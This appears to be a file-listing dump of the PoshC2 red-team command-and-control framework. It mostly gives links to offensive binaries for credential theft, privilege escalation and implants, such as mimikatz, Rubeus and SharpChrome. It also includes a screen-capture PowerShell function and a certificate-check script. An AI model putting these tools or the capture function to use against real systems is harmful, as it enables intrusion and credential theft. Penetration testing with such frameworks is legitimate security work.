-------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netuserenum.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netuserenum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netuserenum.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/netview.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netview.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/netview.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/netview.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/nonpagedldapsearch.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/nonpagedldapsearch.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/nonpagedldapsearch.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/nonpagedldapsearch.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/notepad.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/notepad.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/notepad.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/notepad.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/nslookup.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/nslookup.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/nslookup.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/nslookup.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/probe.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/probe.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/probe.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/probe.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/reg_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/reg_query.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/reg_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/reg_query.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/resources.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/resources.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/resources.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/resources.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/routeprint.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/routeprint.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/routeprint.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/routeprint.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_enum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_enum.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_enum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_enum.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_qc.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qc.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_qc.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qc.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_qdescription.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qdescription.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_qdescription.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qdescription.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_qfailure.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qfailure.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_qfailure.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qfailure.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_qtriggerinfo.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qtriggerinfo.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_qtriggerinfo.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_qtriggerinfo.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_query.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/sc_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/sc_query.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/schtasksenum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/schtasksenum.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/schtasksenum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/schtasksenum.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/schtasksquery.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/schtasksquery.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/schtasksquery.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/schtasksquery.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/tasklist.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/tasklist.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/tasklist.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/tasklist.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/uptime.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/uptime.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/uptime.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/uptime.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/vssenum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/vssenum.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/vssenum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/vssenum.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/whoami.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/whoami.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/whoami.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/whoami.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/windowlist.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/windowlist.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/windowlist.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/windowlist.x86.o -------------------------------------------------------------------------------- /resources/modules/OFs/wmi_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/wmi_query.x64.o -------------------------------------------------------------------------------- /resources/modules/OFs/wmi_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/OFs/wmi_query.x86.o -------------------------------------------------------------------------------- /resources/modules/PBind.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PBind.exe -------------------------------------------------------------------------------- /resources/modules/PEs/ATPMiniDump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/ATPMiniDump.exe -------------------------------------------------------------------------------- /resources/modules/PEs/JuicyPotato.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/JuicyPotato.exe -------------------------------------------------------------------------------- /resources/modules/PEs/MS-RPRN.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/MS-RPRN.exe -------------------------------------------------------------------------------- /resources/modules/PEs/NetMan-Dll.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/NetMan-Dll.exe -------------------------------------------------------------------------------- /resources/modules/PEs/SpoolSample.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/SpoolSample.exe -------------------------------------------------------------------------------- /resources/modules/PEs/UACME.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/UACME.txt -------------------------------------------------------------------------------- /resources/modules/PEs/mimikatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/mimikatz.exe -------------------------------------------------------------------------------- /resources/modules/PEs/net.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PEs/net.exe -------------------------------------------------------------------------------- /resources/modules/PGrabber.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PGrabber.dll -------------------------------------------------------------------------------- /resources/modules/PS.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PS.exe -------------------------------------------------------------------------------- /resources/modules/PassTheCert.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PassTheCert.exe -------------------------------------------------------------------------------- /resources/modules/PingCS.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PingCS.exe -------------------------------------------------------------------------------- /resources/modules/PortScanner.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PortScanner.dll -------------------------------------------------------------------------------- /resources/modules/PwrStatusTracker.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/PwrStatusTracker.dll -------------------------------------------------------------------------------- /resources/modules/RegSave.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/RegSave.exe -------------------------------------------------------------------------------- /resources/modules/Rubeus.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Rubeus.exe -------------------------------------------------------------------------------- /resources/modules/RunAs.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/RunAs.exe -------------------------------------------------------------------------------- /resources/modules/RunOF-Debug.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/RunOF-Debug.exe -------------------------------------------------------------------------------- /resources/modules/RunOF.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/RunOF.exe -------------------------------------------------------------------------------- /resources/modules/RunPE-Debug.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/RunPE-Debug.exe -------------------------------------------------------------------------------- /resources/modules/RunPE.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/RunPE.exe -------------------------------------------------------------------------------- /resources/modules/RunasCs.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/RunasCs.exe -------------------------------------------------------------------------------- /resources/modules/SExec.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SExec.exe -------------------------------------------------------------------------------- /resources/modules/SQLQuery.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SQLQuery.exe -------------------------------------------------------------------------------- /resources/modules/SSLInspectionCheck.ps1: -------------------------------------------------------------------------------- 1 | function SSLInspectionCheck($url, $proxyurl, $proxyuser, $proxypass){ 2 | 3 | $expiration = $null 4 | $certName = $null 5 | $certPublicKeyString = $null 6 | $certSerialNumber = $null 7 | $certThumbprint = $null 8 | $certEffectiveDate = $null 9 | $certIssuer = $null 10 | 11 | write-output "Checking $($url)" 12 | $req = [Net.HttpWebRequest]::Create($url) 13 | $req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko" 14 | if ($proxyurl) { 15 | $wp = New-Object System.Net.WebProxy($proxyurl,$true) 16 | $req.Proxy=$wp; 17 | } 18 | if ($proxyuser) { 19 | $PSS = ConvertTo-SecureString $proxypass -AsPlainText -Force; 20 | $getcreds = new-object system.management.automation.PSCredential $proxyuser,$PSS; 21 | $wp.Credentials = $getcreds; 22 | } 23 | 24 | $req.timeout = 10000 25 | 26 | try { 27 | $req.GetResponse() |Out-Null 28 | } catch { 29 | write-output "Exception while checking URL $($url)`: $($_)" 30 | } 31 | 32 | $expiration = $req.ServicePoint.Certificate.GetExpirationDateString() 33 | $certName = $req.ServicePoint.Certificate.GetName() 34 | $certPublicKeyString = $req.ServicePoint.Certificate.GetPublicKeyString() 35 | $certSerialNumber = $req.ServicePoint.Certificate.GetSerialNumberString() 36 | $certThumbprint = $req.ServicePoint.Certificate.GetCertHashString() 37 | $certEffectiveDate = $req.ServicePoint.Certificate.GetEffectiveDateString() 38 | $certIssuer = $req.ServicePoint.Certificate.GetIssuerName() 39 | write-output "Cert for site $($url). Check details:`n`nCert name: $($certName)`nCert public key: $($certPublicKeyString)`nCert serial number: $($certSerialNumber)`nCert thumbprint: $($certThumbprint)`nCert effective date: $($certEffectiveDate)`nCert Expiry: $($expiration)`nCert issuer: $($certIssuer)" 40 | rv req 41 | 42 | } 43 | -------------------------------------------------------------------------------- /resources/modules/SafetyDump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SafetyDump.exe -------------------------------------------------------------------------------- /resources/modules/SafetyKatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SafetyKatz.exe -------------------------------------------------------------------------------- /resources/modules/SchTasks.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SchTasks.exe -------------------------------------------------------------------------------- /resources/modules/Screenshot.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Screenshot.dll -------------------------------------------------------------------------------- /resources/modules/Screenshot.ps1: -------------------------------------------------------------------------------- 1 | Function Get-Screenshot 2 | { 3 | param($File) 4 | Add-Type -AssemblyName System.Windows.Forms 5 | Add-type -AssemblyName System.Drawing 6 | $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen 7 | $Width = $Screen.Width 8 | $Height = $Screen.Height 9 | $Left = $Screen.Left 10 | $Top = $Screen.Top 11 | $bitmap = New-Object System.Drawing.Bitmap $Width, $Height 12 | $graphic = [System.Drawing.Graphics]::FromImage($bitmap) 13 | $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size) 14 | $msimage = New-Object IO.MemoryStream 15 | if ($File) { 16 | $bitmap.save($file, "png") 17 | } else { 18 | $bitmap.save($msimage, "png") 19 | $b64 = [Convert]::ToBase64String($msimage.toarray()) 20 | } 21 | return $b64 22 | } -------------------------------------------------------------------------------- /resources/modules/Seatbelt.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Seatbelt.exe -------------------------------------------------------------------------------- /resources/modules/SharPersist.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharPersist.exe -------------------------------------------------------------------------------- /resources/modules/SharpApplocker.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpApplocker.exe -------------------------------------------------------------------------------- /resources/modules/SharpCOM.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpCOM.exe -------------------------------------------------------------------------------- /resources/modules/SharpChrome.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpChrome.exe -------------------------------------------------------------------------------- /resources/modules/SharpChromium.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpChromium.exe -------------------------------------------------------------------------------- /resources/modules/SharpCookieMonster.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpCookieMonster.exe -------------------------------------------------------------------------------- /resources/modules/SharpCreateProc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpCreateProc.exe -------------------------------------------------------------------------------- /resources/modules/SharpDPAPI.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpDPAPI.exe -------------------------------------------------------------------------------- /resources/modules/SharpDump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpDump.exe -------------------------------------------------------------------------------- /resources/modules/SharpEDRChecker.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpEDRChecker.exe -------------------------------------------------------------------------------- /resources/modules/SharpEdge.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpEdge.exe -------------------------------------------------------------------------------- /resources/modules/SharpFTP.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpFTP.exe -------------------------------------------------------------------------------- /resources/modules/SharpHound.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpHound.exe -------------------------------------------------------------------------------- /resources/modules/SharpLogger.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpLogger.exe -------------------------------------------------------------------------------- /resources/modules/SharpPrintNightmare.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpPrintNightmare.exe -------------------------------------------------------------------------------- /resources/modules/SharpPrinter.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpPrinter.exe -------------------------------------------------------------------------------- /resources/modules/SharpProcessList.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpProcessList.exe -------------------------------------------------------------------------------- /resources/modules/SharpReg.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpReg.exe -------------------------------------------------------------------------------- /resources/modules/SharpRoast.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpRoast.exe -------------------------------------------------------------------------------- /resources/modules/SharpSC.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpSC.exe -------------------------------------------------------------------------------- /resources/modules/SharpSC2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpSC2.exe -------------------------------------------------------------------------------- /resources/modules/SharpSSDP.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpSSDP.exe -------------------------------------------------------------------------------- /resources/modules/SharpService.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpService.exe -------------------------------------------------------------------------------- /resources/modules/SharpShadowCopy.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpShadowCopy.exe -------------------------------------------------------------------------------- /resources/modules/SharpShares.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpShares.exe -------------------------------------------------------------------------------- /resources/modules/SharpSniper.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpSniper.exe -------------------------------------------------------------------------------- /resources/modules/SharpSocksImplant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpSocksImplant.exe -------------------------------------------------------------------------------- /resources/modules/SharpSploit.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpSploit.dll -------------------------------------------------------------------------------- /resources/modules/SharpTask.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpTask.exe -------------------------------------------------------------------------------- /resources/modules/SharpTelnet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpTelnet.exe -------------------------------------------------------------------------------- /resources/modules/SharpUp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpUp.exe -------------------------------------------------------------------------------- /resources/modules/SharpView.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpView.exe -------------------------------------------------------------------------------- /resources/modules/SharpWMI.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpWMI.exe -------------------------------------------------------------------------------- /resources/modules/SharpWSUS.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpWSUS.exe -------------------------------------------------------------------------------- /resources/modules/SharpWeb.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SharpWeb.exe -------------------------------------------------------------------------------- /resources/modules/Shhmon.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Shhmon.exe -------------------------------------------------------------------------------- /resources/modules/Sitrep.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Sitrep.exe -------------------------------------------------------------------------------- /resources/modules/Stage2-Core.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Stage2-Core.exe -------------------------------------------------------------------------------- 